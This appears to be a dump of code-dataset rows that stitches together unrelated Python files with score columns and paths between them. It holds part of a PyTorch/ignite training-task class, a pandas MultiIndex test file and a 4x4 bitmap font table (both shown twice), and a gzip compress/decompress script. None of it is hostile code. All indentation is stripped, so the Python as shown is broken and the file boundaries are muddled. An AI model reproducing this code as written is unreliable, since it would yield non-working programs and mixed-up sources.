raise RuntimeError('Missing profile field "loss_function" to define the loss function.')
trainer = self.create_trainer(
profile, shared, logger, model, loss_function, optimizer, lr_scheduler,
profile.train_output_transform if 'train_output_transform' in profile else lambda x, y, y_pred,
loss: loss.item()
)
evaluator = self.create_evaluator(
profile, shared, logger, model, loss_function, optimizer, lr_scheduler,
profile.evaluate_output_transform if 'evaluate_output_transform' in profile else lambda x, y, y_pred: (
y_pred, y)
)
context = {}
@evaluator.on(engine.Events.COMPLETED)
def display_metrics(_engine: engine.Engine):
logger.info('EVALUATE EPOCH {} | {}'.format(trainer.state.epoch, ' | '.join(map(
lambda it: '{}: {}'.format(it[0], repr(it[1]).replace('\n', ' ')),
_engine.state.metrics.items(),
))))
@evaluator.on(engine.Events.COMPLETED)
def store_model(_engine: engine.Engine):
if 'compare_metric' not in context:
context['compare_metric'] = float('-inf')
if 'compare_by' not in profile or len(profile.compare_by) == 0:
compare_by = 'loss'
sign = '-'
else:
compare_by = profile.compare_by
if compare_by[0] in '+-':
sign = compare_by[0]
compare_by = compare_by[1:]
else:
sign = '+'
if compare_by not in _engine.state.metrics:
logger.warning(f'Not found "{compare_by}" in metrics. Fall back to loss.')
compare_by = 'loss'
sign = '-'
metric_value = _engine.state.metrics[compare_by]
if sign == '-':
metric_value = -metric_value
if metric_value > context['compare_metric']:
context['compare_metric'] = metric_value
shared[self._model_key] = deepcopy(model.eval())
logger.info(f'Stored the model with {compare_by} of {metric_value}.')
@trainer.on(engine.Events.ITERATION_COMPLETED(
every=int(len(train_loader) * (profile.loss_display if 'loss_display' in profile else 0.1))
))
def display_loss(_engine: engine.Engine):
epoch_iteration = _engine.state.iteration % _engine.state.epoch_length
if epoch_iteration == 0:
epoch_iteration = _engine.state.epoch_length
logger.info('TRAIN EPOCH {} ITERATION {} | output: {}'.format(
_engine.state.epoch, epoch_iteration, _engine.state.output
))
@trainer.on(engine.Events.EPOCH_COMPLETED)
def evaluate(_engine: engine.Engine):
evaluator.run(
validate_loader,
)
self.register_handlers(profile, shared, logger, model, trainer, evaluator, context)
trainer.run(
train_loader,
max_epochs=profile.max_epochs if 'max_epochs' in profile else 100,
)
return Return.SUCCESS
@property
def _model_key(self):
return 'model' if self.prefix is None else f'{self.prefix}_model'
def require(self) -> List[Text]:
"""
The task requires 2 items, including "train_loader" and "validate_loader".
Returns:
"train_loader" and "validate_loader"
"""
return [
'train_loader',
'validate_loader',
]
def provide(self) -> List[Text]:
"""
The task provides 1 item, including "model" or "\\<something\\>_model".
Returns:
"model" or "\\<something\\>_model"
"""
return [
self._model_key
]
def remove(self) -> List[Text]:
"""
This task removes nothing.
Returns:
nothing
"""
return []
@classmethod
def define(cls) -> List[Definition]:
"""
Define the schema of `TrainTask`.
Returns:
Schema of `TrainTask`.
Examples:
See Also [Train AlexNet on Place 365 dataset](https://github.com/chenrz925/waterch-tasker/blob/master/examples/place365_alexnet.toml)
"""
return [
value('model', list, [
value('reference', str),
value('kwargs', list, [])
]),
value('loss_function', list, [
value('reference', str),
value('kwargs', list, [])
]),
value('metrics', list, []),
value('optimizer', list, [
value('reference', str),
value('kwargs', list, []),
value('scheduler', list, [
value('reference', str),
value('kwargs', list)
])
])
]
@abstractmethod
def create_model(self, profile: Profile, shared: Storage, logger: Logger, **kwargs) -> nn.Module:
"""
Implement `create_model` to build the PyTorch model.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
A new model instance.
Notes:
The profile should be attribute "model" in the task profile.
"""
raise NotImplementedError('Please create the model in create_model')
@abstractmethod
def create_loss_function(self, profile: Profile, shared: Storage, logger: Logger, **kwargs) -> nn.Module:
"""
Implement `create_loss_function` to build the PyTorch loss function.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
A new loss function instance.
Notes:
The profile should be attribute "loss_function" in the task profile.
"""
raise NotImplementedError('Please create the loss function in create_loss_function')
@abstractmethod
def create_optimizer(self, profile: Profile, shared: Storage, logger: Logger, model: nn.Module,
**kwargs) -> Tuple[optim.Optimizer, Any]:
"""
Implement `create_optimizer` to build the PyTorch optimizer.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
A tuple of a new optimizer instance and an optional learning-rate scheduler (or None).
Notes:
The profile should be attribute "optimizer" in the task profile.
"""
raise NotImplementedError('Please create the optimizer in create_optimizer')
def prepare_train_batch(
self, profile: Profile, shared: Storage, logger: Logger,
batch: Tuple[torch.Tensor], device: Text, non_blocking: bool = False
):
"""
Preparing batch of samples when training. Implement this function to
customize.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
batch: Raw batch provided by the data loader.
device: Which device of the batch.
non_blocking: Whether the action of moving the batch is blocking.
Returns:
Prepared batch.
"""
x, y = batch
return (
convert_tensor(x, device=torch.device(device), non_blocking=non_blocking),
convert_tensor(y, device=torch.device(device), non_blocking=non_blocking),
)
def prepare_validate_batch(
self, profile: Profile, shared: Storage, logger: Logger,
batch: Tuple[torch.Tensor], device: Text, non_blocking: bool = False
):
"""
Preparing batch of samples when validating. Implement this function to
customize.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
batch: Raw batch provided by the data loader.
device: Which device of the batch.
non_blocking: Whether the action of moving the batch is blocking.
Returns:
Prepared batch.
"""
x, y = batch
return (
convert_tensor(x, device=torch.device(device), non_blocking=non_blocking),
convert_tensor(y, device=torch.device(device), non_blocking=non_blocking),
)
def create_trainer(
self, profile: Profile, shared: Storage, logger: Logger,
model: nn.Module, loss_function: nn.Module, optimizer: optim.Optimizer, lr_scheduler: Any,
output_transform=lambda x, y, y_pred, loss: loss.item(),
**kwargs
) -> engine.Engine:
"""
Build the trainer engine. Re-implement this function when you
want to customize the updating actions of training.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
model: The model to train.
loss_function: The loss function to train.
optimizer: The optimizer to train.
lr_scheduler: The scheduler to control the learning rate.
output_transform: The action to transform the output of the model.
Returns:
The trainer engine.
"""
if 'device' in profile:
device_type = profile.device
else:
device_type = 'cpu'
if 'non_blocking' in profile:
non_blocking = profile.non_blocking
else:
non_blocking = False
if 'deterministic' in profile:
deterministic = profile.deterministic
else:
deterministic = False
def _update(_engine: engine.Engine, _batch: Tuple[torch.Tensor]):
model.train()
optimizer.zero_grad()
x, y = self.prepare_train_batch(profile, shared, logger, _batch, device=device_type,
non_blocking=non_blocking)
y_pred = model(x)
loss = loss_function(y_pred, y)
loss.backward()
optimizer.step()
if lr_scheduler is not None:
lr_scheduler.step(loss)
return output_transform(x, y, y_pred, loss)
trainer = engine.Engine(_update) if not deterministic else engine.DeterministicEngine(_update)
return trainer
def register_metrics(
self, profile: Profile, shared: Storage, logger: Logger,
_metrics: Dict
):
"""
Register the metric methods.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
_metrics: The metrics dictionary to register.
Returns:
The metrics dictionary.
"""
return _metrics
def register_handlers(self, profile, shared, logger, model, trainer, evaluator, context):
"""
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
model: The model to train.
trainer: The trainer of the model.
evaluator: The evaluator of the model.
context: The context dictionary to store states in handlers.
Returns:
Nothing.
"""
pass
def create_evaluator(
self, profile: Profile, shared: Storage, logger: Logger,
model: nn.Module, loss_function: nn.Module, optimizer: optim.Optimizer, lr_scheduler: Any,
output_transform=lambda x, y, y_pred: (y_pred, y),
**kwargs
) -> engine.Engine:
"""
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
model: The model to train.
loss_function: The loss function to train.
optimizer: The optimizer to train.
lr_scheduler: The scheduler to control the learning rate.
output_transform: The action to transform the output of the model.
Returns:
The evaluator engine.
"""
if 'device' in profile:
device_type = profile.device
else:
device_type = 'cpu'
if 'non_blocking' in profile:
non_blocking = profile.non_blocking
else:
non_blocking = False
if 'deterministic' in profile:
deterministic = profile.deterministic
else:
deterministic = False
_metrics = {}
self.register_metrics(profile, shared, logger, _metrics)
def _inference(_engine: engine.Engine, _batch: Tuple[torch.Tensor]):
model.eval()
with torch.no_grad():
x, y = self.prepare_validate_batch(profile, shared, logger, _batch, device=device_type,
non_blocking=non_blocking)
y_pred = model(x)
return output_transform(x, y, y_pred)
evaluator = engine.DeterministicEngine(_inference) if deterministic else engine.Engine(_inference)
for name, metric in _metrics.items():
metric.attach(evaluator, name)
return evaluator
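# The trainer/evaluator factories above read a few optional flags from the runtime
# profile. A minimal, hedged sketch of the corresponding TOML section is shown below;
# the section name "[train]" and the concrete values are assumptions, only the keys
# 'device', 'non_blocking' and 'deterministic' come from the code above.
#
#   [train]
#   device = "cuda:0"        # defaults to "cpu" when omitted
#   non_blocking = true      # defaults to false when omitted
#   deterministic = false    # true selects engine.DeterministicEngine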
class SimpleTrainTask(TrainTask):
"""
<i>tasker.contrib.torch.SimpleTrainTask</i>
    An easy-to-use base class of task for training a model. You can
    create the model with only a reference to the dataset and the related profile.
Examples:
See Also [Train AlexNet on Place 365 dataset](https://github.com/chenrz925/waterch-tasker/blob/master/examples/place365_alexnet.toml)
"""
def create_model(self, profile: Profile, shared: Storage, logger: Logger, **kwargs) -> nn.Module:
"""
You can build the model class implementing [`Module`](https://pytorch.org/docs/stable/generated/torch.nn.Module.html#torch.nn.Module).
And the parameters of the model class can be passed by `kwargs`.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
New model instance.
"""
if 'reference' in profile:
clz = profile.reference
try:
if not issubclass(clz, nn.Module):
logger.warning('Referenced class is not a subclass of torch.nn.Module.')
except TypeError:
logger.warning('Referenced object is not a class, maybe a function?')
else:
raise RuntimeError('Missing field "reference" in the model profile.')
if 'kwargs' in profile:
kwargs = profile.kwargs
else:
kwargs = {}
model = clz(**kwargs)
return model
def create_loss_function(self, profile: Profile, shared: Storage, logger: Logger, **kwargs) -> nn.Module:
"""
You can build the loss function class implementing [`Module`](https://pytorch.org/docs/stable/generated/torch.nn.Module.html#torch.nn.Module).
And the parameters of the model class can be passed by `kwargs`.
        All loss functions officially provided by PyTorch can be referenced.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
            New loss function instance.
"""
if 'reference' in profile:
clz = profile.reference
try:
if not issubclass(clz, nn.Module):
logger.warning('Referenced class is not a subclass of torch.nn.Module.')
except TypeError:
logger.warning('Referenced object is not a class, maybe a function?')
else:
raise RuntimeError('Missing field "reference" in the loss_function profile.')
if 'kwargs' in profile:
kwargs = profile.kwargs
else:
kwargs = {}
loss_function = clz(**kwargs)
return loss_function
def create_optimizer(self, profile: Profile, shared: Storage, logger: Logger, model: nn.Module, **kwargs) -> Tuple[
optim.Optimizer, Any]:
"""
You can build the optimizer class implementing [`Optimizer`](https://pytorch.org/docs/stable/optim.html#torch.optim.Optimizer).
And the parameters of the optimizer class can be passed by `kwargs`.
        All optimizers officially provided by PyTorch can be referenced.
You can also build a learning rate scheduler through `lr_scheduler` field.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
model: The model to train.
Returns:
New optimizer instance.
"""
if 'reference' in profile:
clz = profile.reference
try:
if not issubclass(clz, optim.Optimizer):
logger.warning('Referenced class is not a subclass of torch.optim.Optimizer.')
except TypeError:
logger.warning('Referenced object is not a class, maybe a function?')
else:
raise RuntimeError('Missing field "reference" in the optimizer profile.')
if 'kwargs' in profile:
kwargs = profile.kwargs
else:
kwargs = {}
optimizer = clz(model.parameters(), **kwargs)
if 'lr_scheduler' in profile:
if 'reference' in profile.lr_scheduler:
lr_scheduler_clz = profile.lr_scheduler.reference
if 'kwargs' in profile.lr_scheduler:
lr_scheduler_kwargs = profile.lr_scheduler.kwargs
else:
lr_scheduler_kwargs = {}
lr_scheduler = lr_scheduler_clz(optimizer, **lr_scheduler_kwargs)
else:
lr_scheduler = None
else:
lr_scheduler = None
return optimizer, lr_scheduler
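    # Hedged sketch of an optimizer profile consumed by create_optimizer above. How the
    # 'reference' field is resolved into an actual class is left to the profile loader,
    # so the string form shown here is an assumption; the kwargs and lr_scheduler
    # sub-table mirror the fields the code reads ('reference', 'kwargs', 'lr_scheduler').
    #
    #   [optimizer]
    #   reference = "torch.optim.Adam"
    #   kwargs = { lr = 1e-3 }
    #
    #   [optimizer.lr_scheduler]
    #   reference = "torch.optim.lr_scheduler.ReduceLROnPlateau"
    #   kwargs = { patience = 5 }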
def register_metrics(
self, profile: Profile, shared: Storage, logger: Logger,
_metrics: Dict
):
"""
Register the metric methods. In `SimpleTrainTask`,
all the metrics can be initialized in profile by
"M" type field.
Examples:
Register accuracy as metric method.
```toml
accuracy = '$M$ignite.metrics.Accuracy'
```
Register F1 macro as metric method.
```toml
f1macro = '1$M$tasker.contrib.torch.FBetaMacro$I'
```
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
_metrics: The metrics dictionary to register.
Returns:
The metrics dictionary.
"""
_metrics['loss'] = metrics.Loss(self.create_loss_function(profile.loss_function, shared, logger))
if 'metrics' in profile:
_metrics.update(profile.metrics)
return _metrics | 0.828904 | 0.539347 |
import numpy as np
import pytest
from pandas import MultiIndex
import pandas._testing as tm
def test_numeric_compat(idx):
with pytest.raises(TypeError, match="cannot perform __mul__"):
idx * 1
with pytest.raises(TypeError, match="cannot perform __rmul__"):
1 * idx
div_err = "cannot perform __truediv__"
with pytest.raises(TypeError, match=div_err):
idx / 1
div_err = div_err.replace(" __", " __r")
with pytest.raises(TypeError, match=div_err):
1 / idx
with pytest.raises(TypeError, match="cannot perform __floordiv__"):
idx // 1
with pytest.raises(TypeError, match="cannot perform __rfloordiv__"):
1 // idx
@pytest.mark.parametrize("method", ["all", "any"])
def test_logical_compat(idx, method):
msg = f"cannot perform {method}"
with pytest.raises(TypeError, match=msg):
getattr(idx, method)()
def test_inplace_mutation_resets_values():
levels = [["a", "b", "c"], [4]]
levels2 = [[1, 2, 3], ["a"]]
codes = [[0, 1, 0, 2, 2, 0], [0, 0, 0, 0, 0, 0]]
mi1 = MultiIndex(levels=levels, codes=codes)
mi2 = MultiIndex(levels=levels2, codes=codes)
# instantiating MultiIndex should not access/cache _.values
assert "_values" not in mi1._cache
assert "_values" not in mi2._cache
vals = mi1.values.copy()
vals2 = mi2.values.copy()
# accessing .values should cache ._values
assert mi1._values is mi1._cache["_values"]
assert mi1.values is mi1._cache["_values"]
assert isinstance(mi1._cache["_values"], np.ndarray)
# Make sure level setting works
new_vals = mi1.set_levels(levels2).values
tm.assert_almost_equal(vals2, new_vals)
# Non-inplace doesn't drop _values from _cache [implementation detail]
tm.assert_almost_equal(mi1._cache["_values"], vals)
# ...and values is still same too
tm.assert_almost_equal(mi1.values, vals)
# Inplace should drop _values from _cache
with tm.assert_produces_warning(FutureWarning):
mi1.set_levels(levels2, inplace=True)
assert "_values" not in mi1._cache
tm.assert_almost_equal(mi1.values, vals2)
# Make sure label setting works too
codes2 = [[0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]]
exp_values = np.empty((6,), dtype=object)
exp_values[:] = [(1, "a")] * 6
# Must be 1d array of tuples
assert exp_values.shape == (6,)
new_mi = mi2.set_codes(codes2)
assert "_values" not in new_mi._cache
new_values = new_mi.values
assert "_values" in new_mi._cache
# Not inplace shouldn't change
tm.assert_almost_equal(mi2._cache["_values"], vals2)
# Should have correct values
tm.assert_almost_equal(exp_values, new_values)
# ...and again setting inplace should drop _values from _cache, etc
with tm.assert_produces_warning(FutureWarning):
mi2.set_codes(codes2, inplace=True)
assert "_values" not in mi2._cache
tm.assert_almost_equal(mi2.values, new_values)
assert "_values" in mi2._cache
def test_pickle_compat_construction():
# this is testing for pickle compat
# need an object to create with
with pytest.raises(TypeError, match="Must pass both levels and codes"):
MultiIndex() | venv/Lib/site-packages/pandas/tests/indexes/multi/test_compat.py | import numpy as np
import pytest
from pandas import MultiIndex
import pandas._testing as tm
def test_numeric_compat(idx):
with pytest.raises(TypeError, match="cannot perform __mul__"):
idx * 1
with pytest.raises(TypeError, match="cannot perform __rmul__"):
1 * idx
div_err = "cannot perform __truediv__"
with pytest.raises(TypeError, match=div_err):
idx / 1
div_err = div_err.replace(" __", " __r")
with pytest.raises(TypeError, match=div_err):
1 / idx
with pytest.raises(TypeError, match="cannot perform __floordiv__"):
idx // 1
with pytest.raises(TypeError, match="cannot perform __rfloordiv__"):
1 // idx
@pytest.mark.parametrize("method", ["all", "any"])
def test_logical_compat(idx, method):
msg = f"cannot perform {method}"
with pytest.raises(TypeError, match=msg):
getattr(idx, method)()
def test_inplace_mutation_resets_values():
levels = [["a", "b", "c"], [4]]
levels2 = [[1, 2, 3], ["a"]]
codes = [[0, 1, 0, 2, 2, 0], [0, 0, 0, 0, 0, 0]]
mi1 = MultiIndex(levels=levels, codes=codes)
mi2 = MultiIndex(levels=levels2, codes=codes)
# instantiating MultiIndex should not access/cache _.values
assert "_values" not in mi1._cache
assert "_values" not in mi2._cache
vals = mi1.values.copy()
vals2 = mi2.values.copy()
# accessing .values should cache ._values
assert mi1._values is mi1._cache["_values"]
assert mi1.values is mi1._cache["_values"]
assert isinstance(mi1._cache["_values"], np.ndarray)
# Make sure level setting works
new_vals = mi1.set_levels(levels2).values
tm.assert_almost_equal(vals2, new_vals)
# Non-inplace doesn't drop _values from _cache [implementation detail]
tm.assert_almost_equal(mi1._cache["_values"], vals)
# ...and values is still same too
tm.assert_almost_equal(mi1.values, vals)
# Inplace should drop _values from _cache
with tm.assert_produces_warning(FutureWarning):
mi1.set_levels(levels2, inplace=True)
assert "_values" not in mi1._cache
tm.assert_almost_equal(mi1.values, vals2)
# Make sure label setting works too
codes2 = [[0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]]
exp_values = np.empty((6,), dtype=object)
exp_values[:] = [(1, "a")] * 6
# Must be 1d array of tuples
assert exp_values.shape == (6,)
new_mi = mi2.set_codes(codes2)
assert "_values" not in new_mi._cache
new_values = new_mi.values
assert "_values" in new_mi._cache
# Not inplace shouldn't change
tm.assert_almost_equal(mi2._cache["_values"], vals2)
# Should have correct values
tm.assert_almost_equal(exp_values, new_values)
# ...and again setting inplace should drop _values from _cache, etc
with tm.assert_produces_warning(FutureWarning):
mi2.set_codes(codes2, inplace=True)
assert "_values" not in mi2._cache
tm.assert_almost_equal(mi2.values, new_values)
assert "_values" in mi2._cache
def test_pickle_compat_construction():
# this is testing for pickle compat
# need an object to create with
with pytest.raises(TypeError, match="Must pass both levels and codes"):
MultiIndex() | 0.512205 | 0.662783 |
chars = [
[
"0000",
"0000",
"0000",
"0000"
],
[
"0100",
"0100",
"0000",
"0100"
],
[
"1010",
"1010",
"0000",
"0000"
],
[
"1010",
"1111",
"1010",
"1111"
],
[
"1110",
"1100",
"0110",
"1110"
],
[
"1001",
"0010",
"0100",
"1001"
],
[
"0110",
"0110",
"1010",
"1111"
],
[
"0100",
"0100",
"0000",
"0000"
],
[
"0010",
"0100",
"0100",
"0010"
],
[
"0100",
"0010",
"0010",
"0100"
],
[
"1010",
"0100",
"1010",
"0000"
],
[
"0000",
"0100",
"1110",
"0100"
],
[
"0000",
"0000",
"0010",
"0100"
],
[
"0000",
"0000",
"1110",
"0000"
],
[
"0000",
"0000",
"0000",
"0100"
],
[
"0001",
"0010",
"0100",
"1000"
],
[
"0110",
"1010",
"1010",
"1100"
],
[
"0010",
"0110",
"0010",
"0010"
],
[
"0110",
"0001",
"0110",
"0111"
],
[
"1100",
"0110",
"0010",
"1100"
],
[
"1010",
"1110",
"0010",
"0010"
],
[
"1110",
"1000",
"0110",
"1110"
],
[
"0100",
"0111",
"0101",
"0011"
],
[
"1100",
"0010",
"0010",
"0010"
],
[
"1110",
"1010",
"1110",
"1110"
],
[
"1100",
"1010",
"0110",
"0010"
],
[
"0100",
"0000",
"0100",
"0000"
],
[
"0100",
"0000",
"0100",
"1000"
],
[
"0000",
"0010",
"0100",
"0010"
],
[
"0000",
"1110",
"0000",
"1110"
],
[
"0000",
"0100",
"0010",
"0100"
],
[
"1110",
"0010",
"0110",
"0100"
],
[
"0110",
"1001",
"1010",
"0111"
],
[
"0100",
"1010",
"1110",
"1010"
],
[
"0110",
"0111",
"0101",
"0110"
],
[
"0011",
"0100",
"0100",
"0011"
],
[
"0110",
"0101",
"0101",
"0110"
],
[
"0011",
"0110",
"0100",
"0111"
],
[
"0111",
"0100",
"0110",
"0100"
],
[
"0111",
"0100",
"0101",
"0111"
],
[
"1010",
"1010",
"1110",
"1010"
],
[
"1110",
"0100",
"0100",
"1110"
],
[
"0010",
"0010",
"1010",
"1110"
],
[
"0101",
"0110",
"0110",
"0101"
],
[
"0100",
"0100",
"0100",
"0111"
],
[
"1001",
"1111",
"1001",
"1001"
],
[
"1110",
"1010",
"1010",
"1010"
],
[
"0110",
"1001",
"1001",
"0110"
],
[
"0110",
"0101",
"0110",
"0100"
],
[
"0100",
"1010",
"1010",
"0111"
],
[
"0110",
"0101",
"0110",
"0101"
],
[
"0110",
"1100",
"0110",
"1100"
],
[
"1110",
"0100",
"0100",
"0100"
],
[
"1010",
"1010",
"1010",
"0110"
],
[
"1010",
"1010",
"1110",
"0100"
],
[
"1001",
"1001",
"1111",
"0110"
],
[
"1010",
"1010",
"0100",
"1010"
],
[
"1010",
"1010",
"0100",
"0100"
],
[
"1111",
"0010",
"0100",
"1111"
],
[
"0110",
"0100",
"0100",
"0110"
],
[
"1000",
"0100",
"0010",
"0001"
],
[
"0110",
"0010",
"0010",
"0110"
],
[
"0100",
"1010",
"0000",
"0000"
],
[
"0000",
"0000",
"0000",
"1111"
],
[
"0100",
"0010",
"0000",
"0000"
],
[
"0000",
"0110",
"1010",
"0110"
],
[
"0100",
"0110",
"0101",
"0110"
],
[
"0000",
"0110",
"1000",
"0110"
],
[
"0010",
"0110",
"1010",
"0110"
],
[
"0110",
"1010",
"1100",
"0110"
],
[
"0010",
"0100",
"0110",
"0100"
],
[
"0110",
"1000",
"1010",
"0110"
],
[
"0100",
"0100",
"0111",
"0101"
],
[
"0100",
"0000",
"0100",
"0100"
],
[
"0010",
"0010",
"1010",
"0100"
],
[
"0100",
"0101",
"0110",
"0101"
],
[
"0100",
"0100",
"0100",
"0010"
],
[
"1000",
"1111",
"1011",
"1011"
],
[
"0000",
"1100",
"1010",
"1010"
],
[
"0000",
"0100",
"1010",
"0100"
],
[
"0010",
"0101",
"0110",
"0100"
],
[
"0100",
"1010",
"0110",
"0011"
],
[
"0100",
"0110",
"0100",
"0100"
],
[
"0000",
"0110",
"0100",
"1100"
],
[
"0100",
"1110",
"0100",
"0100"
],
[
"0000",
"1010",
"1010",
"0110"
],
[
"0000",
"1010",
"1110",
"0100"
],
[
"0000",
"1011",
"1011",
"0110"
],
[
"0000",
"1010",
"0100",
"1010"
],
[
"0000",
"1010",
"0100",
"0100"
],
[
"0000",
"1100",
"0100",
"0110"
],
[
"0110",
"0100",
"1100",
"0110"
],
[
"0010",
"0010",
"0010",
"0010"
],
[
"0110",
"0010",
"0011",
"0110"
],
[
"0000",
"0101",
"1010",
"0000"
],
] | font4x4.py | chars = [
[
"0000",
"0000",
"0000",
"0000"
],
[
"0100",
"0100",
"0000",
"0100"
],
[
"1010",
"1010",
"0000",
"0000"
],
[
"1010",
"1111",
"1010",
"1111"
],
[
"1110",
"1100",
"0110",
"1110"
],
[
"1001",
"0010",
"0100",
"1001"
],
[
"0110",
"0110",
"1010",
"1111"
],
[
"0100",
"0100",
"0000",
"0000"
],
[
"0010",
"0100",
"0100",
"0010"
],
[
"0100",
"0010",
"0010",
"0100"
],
[
"1010",
"0100",
"1010",
"0000"
],
[
"0000",
"0100",
"1110",
"0100"
],
[
"0000",
"0000",
"0010",
"0100"
],
[
"0000",
"0000",
"1110",
"0000"
],
[
"0000",
"0000",
"0000",
"0100"
],
[
"0001",
"0010",
"0100",
"1000"
],
[
"0110",
"1010",
"1010",
"1100"
],
[
"0010",
"0110",
"0010",
"0010"
],
[
"0110",
"0001",
"0110",
"0111"
],
[
"1100",
"0110",
"0010",
"1100"
],
[
"1010",
"1110",
"0010",
"0010"
],
[
"1110",
"1000",
"0110",
"1110"
],
[
"0100",
"0111",
"0101",
"0011"
],
[
"1100",
"0010",
"0010",
"0010"
],
[
"1110",
"1010",
"1110",
"1110"
],
[
"1100",
"1010",
"0110",
"0010"
],
[
"0100",
"0000",
"0100",
"0000"
],
[
"0100",
"0000",
"0100",
"1000"
],
[
"0000",
"0010",
"0100",
"0010"
],
[
"0000",
"1110",
"0000",
"1110"
],
[
"0000",
"0100",
"0010",
"0100"
],
[
"1110",
"0010",
"0110",
"0100"
],
[
"0110",
"1001",
"1010",
"0111"
],
[
"0100",
"1010",
"1110",
"1010"
],
[
"0110",
"0111",
"0101",
"0110"
],
[
"0011",
"0100",
"0100",
"0011"
],
[
"0110",
"0101",
"0101",
"0110"
],
[
"0011",
"0110",
"0100",
"0111"
],
[
"0111",
"0100",
"0110",
"0100"
],
[
"0111",
"0100",
"0101",
"0111"
],
[
"1010",
"1010",
"1110",
"1010"
],
[
"1110",
"0100",
"0100",
"1110"
],
[
"0010",
"0010",
"1010",
"1110"
],
[
"0101",
"0110",
"0110",
"0101"
],
[
"0100",
"0100",
"0100",
"0111"
],
[
"1001",
"1111",
"1001",
"1001"
],
[
"1110",
"1010",
"1010",
"1010"
],
[
"0110",
"1001",
"1001",
"0110"
],
[
"0110",
"0101",
"0110",
"0100"
],
[
"0100",
"1010",
"1010",
"0111"
],
[
"0110",
"0101",
"0110",
"0101"
],
[
"0110",
"1100",
"0110",
"1100"
],
[
"1110",
"0100",
"0100",
"0100"
],
[
"1010",
"1010",
"1010",
"0110"
],
[
"1010",
"1010",
"1110",
"0100"
],
[
"1001",
"1001",
"1111",
"0110"
],
[
"1010",
"1010",
"0100",
"1010"
],
[
"1010",
"1010",
"0100",
"0100"
],
[
"1111",
"0010",
"0100",
"1111"
],
[
"0110",
"0100",
"0100",
"0110"
],
[
"1000",
"0100",
"0010",
"0001"
],
[
"0110",
"0010",
"0010",
"0110"
],
[
"0100",
"1010",
"0000",
"0000"
],
[
"0000",
"0000",
"0000",
"1111"
],
[
"0100",
"0010",
"0000",
"0000"
],
[
"0000",
"0110",
"1010",
"0110"
],
[
"0100",
"0110",
"0101",
"0110"
],
[
"0000",
"0110",
"1000",
"0110"
],
[
"0010",
"0110",
"1010",
"0110"
],
[
"0110",
"1010",
"1100",
"0110"
],
[
"0010",
"0100",
"0110",
"0100"
],
[
"0110",
"1000",
"1010",
"0110"
],
[
"0100",
"0100",
"0111",
"0101"
],
[
"0100",
"0000",
"0100",
"0100"
],
[
"0010",
"0010",
"1010",
"0100"
],
[
"0100",
"0101",
"0110",
"0101"
],
[
"0100",
"0100",
"0100",
"0010"
],
[
"1000",
"1111",
"1011",
"1011"
],
[
"0000",
"1100",
"1010",
"1010"
],
[
"0000",
"0100",
"1010",
"0100"
],
[
"0010",
"0101",
"0110",
"0100"
],
[
"0100",
"1010",
"0110",
"0011"
],
[
"0100",
"0110",
"0100",
"0100"
],
[
"0000",
"0110",
"0100",
"1100"
],
[
"0100",
"1110",
"0100",
"0100"
],
[
"0000",
"1010",
"1010",
"0110"
],
[
"0000",
"1010",
"1110",
"0100"
],
[
"0000",
"1011",
"1011",
"0110"
],
[
"0000",
"1010",
"0100",
"1010"
],
[
"0000",
"1010",
"0100",
"0100"
],
[
"0000",
"1100",
"0100",
"0110"
],
[
"0110",
"0100",
"1100",
"0110"
],
[
"0010",
"0010",
"0010",
"0010"
],
[
"0110",
"0010",
"0011",
"0110"
],
[
"0000",
"0101",
"1010",
"0000"
],
] | 0.275812 | 0.391755 |
import gzip
import io
import json
import time
import sys
def decompress(inputBytes):
with io.BytesIO() as bio:
with io.BytesIO(inputBytes) as stream:
decompressor = gzip.GzipFile(fileobj=stream, mode='r')
while True: # until EOF
chunk = decompressor.read(8192)
if not chunk:
decompressor.close()
bio.seek(0)
return bio.read().decode("utf-8")
bio.write(chunk)
return None
def compress(inputString):
with io.BytesIO() as bio:
bio.write(inputString.encode("utf-8"))
bio.seek(0)
with io.BytesIO() as stream:
compressor = gzip.GzipFile(fileobj=stream, mode='w')
while True: # until EOF
chunk = bio.read(8192)
if not chunk: # EOF?
compressor.close()
return stream.getvalue()
compressor.write(chunk)
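# Hedged usage sketch (not part of the original CLI flow): round-trip an arbitrary JSON
# string through the compress()/decompress() helpers defined above.
def _roundtrip_demo():
    sample = json.dumps({"hello": "world"})
    packed = compress(sample)       # gzip-compressed bytes
    unpacked = decompress(packed)   # back to the original utf-8 string
    assert unpacked == sample
    return len(packed)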
if __name__ == "__main__":
    if len(sys.argv) >= 2:
fn = ' '.join(sys.argv[1:])
ext = fn.split('.')[-1]
try:
with open(fn, "rb") as ifstream:
if ext == 'json':
print(f'Compressing "{fn}"')
data = compress(ifstream.read().decode('utf-8'))
with open(".".join(fn.split(".")[:-1]) + ".gzip", "wb") as ofstream:
ofstream.write(data)
print('Done')
elif ext == 'gzip':
print(f'Decompressing "{fn}"')
data = decompress(ifstream.read())
with open(".".join(fn.split(".")[:-1]) + ".json", "w", encoding="utf-8") as ofstream:
ofstream.write(data)
print('Done')
else:
print(f'Unknown file type "{ext}"')
except:
print(f'Error opening file "{fn}"')
else:
        print('Please drag and drop either a .json or .gzip file onto save_gzipper.py to compress/decompress it')
